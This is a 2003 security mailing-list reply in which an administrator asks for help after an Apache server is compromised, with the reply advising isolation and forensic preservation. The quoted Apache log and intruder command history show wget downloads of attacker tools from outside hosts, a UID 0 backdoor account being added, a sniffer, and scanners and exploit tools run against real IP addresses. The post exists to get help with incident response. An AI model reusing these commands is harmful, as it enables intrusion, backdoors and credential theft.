
Re: [suse-security] Apache Gain Remote Shell Access
UNPLUG the network cable and reinstall the machine on another NEW HDD
(preserve the actual HDD for further forensic investigations; the command
history below shows an attempt to add a UID 0 account, so treat the box as
root-compromised, not just wwwrun) - but UNPLUG IT NOW!!!!!


----- Original Message -----
From: "Marco Lum" <marco@xxxxxxxxxxxxx>
To: "suse-security" <suse-security@xxxxxxxx>
Sent: Wednesday, September 03, 2003 7:43 PM
Subject: [suse-security] Apache Gain Remote Shell Access


> Help, Help, Somebody help!!!
>
> I found that somebody gained access as wwwrun, downloaded programs and tried
> to hack into other servers.
>
> Follows found in error_log of apache
>
> --09:41:10-- http://www.vulturul.org/vulturul/vulturu.tgz
> => `vulturu.tgz'
> Resolving www.vulturul.org... done.
> Connecting to www.vulturul.org[195.110.124.188]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 9,432 [application/x-tar]
>
> 0K ......... 100%
> 13.69 KB/s
>
> 09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]
>
>
> bind: Address already in use
> bind: Address already in use
> --09:33:57-- http://geocities.com/supers7ar/bin.tar.gz
> => `bin.tar.gz'
> Resolving geocities.com... done.
> Connecting to geocities.com[66.218.77.68]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 19,748 [application/x-gzip]
>
> 0K .......... ......... 100%
> 65.37 KB/s
>
> 09:33:59 (65.37 KB/s) - `bin.tar.gz' saved [19748/19748]
>
> sh: line 1: ./bin.tar.gz: Permission denied
>
> gzip: stdin: not in gzip format
> tar: Child returned status 1--15:50:22-- http://195.174.78.202/a.out
> => `a.out'
> Resolving 195.174.78.202... done.
> Connecting to 195.174.78.202:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 13,444 [text/plain]
>
> 0K .......... ... 100%
> 3.37 KB/s
>
> 15:50:27 (3.37 KB/s) - `a.out' saved [13444/13444]
>
> sh: line 1: ./a.out: Permission denied
> chmod: invalid mode string: `x'
> sh: line 1: ./a.out: Permission denied
> Bad syntax, perhaps a bogus '-'?
>
> sh: line 1: cd: /tmp/vulturu: No such file or directory
> --20:25:35-- http://www.vulturul.org/vulturul/vulturu.tgz
> => `vulturu.tgz'
> Resolving www.vulturul.org... done.
> Connecting to www.vulturul.org[195.110.124.188]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 9,432 [application/x-tar]
>
> 0K ......... 100%
> 13.67 KB/s
>
> 20:25:38 (13.67 KB/s) - `vulturu.tgz' saved [9432/9432]
>
>
> tar: Error exit delayed from previous errors
>
> sh: line 1: cd: /tmp/": No such file or directory
>
>
> Also found his command history:
>
>
> id
> /usr/sbin/adduser vulturul -u0 -g0 -M;
> cd /usr/local/games/
> ls -ax
> wget www.vulturul.org/vulturul/bnc.tgz
> cd /tmp/" "
> socklist
> killall -9 nsl
> ls -ax
> rm -rf epcs2
> rm -rf ns
> rm -rf nsl
> rm -rf p
> rm -rf pk
> ls -ax
> wget www.vulturul.org/vulturul/bnc.tgz
> tar xvfz bnc.tgz
> mv psybnc "~. "
> cd "~. "
> mv psybnc " "
> export PATH=:PATH
> ./" "
> id
> ls --color
> ./li
> ls --color
> ./p
> exec ./p 8003
> id
> pwd
> cd ..
> cd ..
> ls -ax
> ls -ax --color
> rm -rf edu.gz
> rm -rf local.tar.gz
> rm -rf local
> cd 3du
> ls --colorls --color
> ./scan 200.13.230.37
> ./scan 200.13.230.37 -d 6
> ./scan 202.30.198.226 -d 6
> /scan 202.186.250.157
> ./scan
> ./scan 202.186.250.157
> ./scan 202.186.250.157 -d 6
> ./scan 64.106.104.84 -d 6
> ./scan 64.106.104.84 -d 6
> ./scan 128.119.213.136 -d 2
> d ..
> cd ..
> ls -ax
> cd atd
> ls -ax
> ./osslmass2 mass.log
> ./osslmass2 mass.log
> cd ../atd
> ls -ax
> cd ..
> ls -ax --color
> pico
> ./pico
> mv pico /usr/bin
> pico
> ls -ax
> mv pico /usr/bin
> cp pico /usr/bin/pico
> cd 3du
> ls -ax --color
> cd ..
> wget http://geocities.com/supers7ar/boom.tar.gz
> tar xvfz boom.tar.gz
> cd boom
> ls -ax
> ./r00t./r00t -t 193.231.142 -d 3
> ./r00t -t 193.231.142 -d 2
> ./r00t -t 193.231.142 -d 4
> ./r00t -t 193.231.142 -d 7
> ./r00t -t 193.231.142 -d 8
> cd ..
> pwd
> wget http://geocities.com/supers7ar/sshup.tar.gz
> tar xvfz sshup.tar.gz
> cd ssh-3.0.1/
> ls -ax
> cd ..
> rm -rf ssh-3.0.1/
> rm -rf sshup.tar.gz
> ls -ax --color
> rm -rf boom.tar.gz
> cd ~.
> cd " ~.
>
> q
>
> q
>
> }
>
> q
>
> exit
>
> ls -ax
> wget www.vulturul.org/vulturul/linsniffer
> chmod +x linsniffer
> ./linsniffer
> ls -ax
> rm -rf linsniffer
> ls -ax --color
> id
> ./heh
>
> ./r00t -t 128.100.20 -d 8
> ./r00t -t 193.231.142 -d 3
> ./r00t -t 193.231.142 -d 2
>
> ./scan 200.13.230.37
>
> Please help, I can't find where he got in~~!
>
> --
> Marco Lum
> Net Service Manager
>
>
> ___________________________________________________________________________________________
> System Development Service
> Inter/Intra/Local-Area Networking Service
>
> VOICE: +852 2851 1190
> FAX : +852 2851 1109
> Email: enquiry@xxxxxxxxxxxxx
> WWWeb: http://www.hkservice.com
>
> HK Service Company
> HK Service Consultants Limited
>
>
>
>
> --
> Check the headers for your unsubscription address
> For additional commands, e-mail: suse-security-help@xxxxxxxx
> Security-related bug reports go to security@xxxxxxx, not here
>
>


